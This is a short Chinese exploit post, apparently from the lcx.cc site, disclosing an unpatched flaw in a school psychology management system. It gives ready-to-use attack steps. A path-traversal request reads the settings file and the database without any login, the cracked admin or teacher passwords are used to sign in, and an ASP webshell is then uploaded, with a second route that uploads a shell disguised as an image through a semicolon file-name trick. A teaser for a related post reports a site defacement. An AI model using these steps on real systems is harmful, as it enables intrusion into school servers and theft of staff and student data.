【ODay】心海学校心理管理系统0day

  • A+
所属分类:lcx

漏洞名称:心海学校心理管理系统0day by:shady

漏洞描述:admin/fileopen.asp没有验证是否登录

利用方法:
一:
admin/fileopen.asp?filename=../inc/SETTINGS.ASP

用记事本打开下载下的文件,得到数据库地址,

继续用fileopen.asp?filename=数据库相对地址,

下载后用access密码破解软件破解密码,

得到管理员或老师的账号密码,登陆后,

在admin/update.asp直接上传asp得到shell

二:
inc/upload.asp?fl=1.asp;1 上传图片格式的asp马,得到Shell

文章来源于lcx.cc:【ODay】心海学校心理管理系统0day

相关推荐: 【事件】新网(xinnet) xinnet.com 被黑

  http://domain.xinnet.com/hack.txt 备注:2010-8-31 8:09:21 检查,黑页依旧存在。文章来源于lcx.cc:【事件】新网(xinnet) xinnet.com 被黑相关推荐: 【转载】我的祖国 - 中国现实,相…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: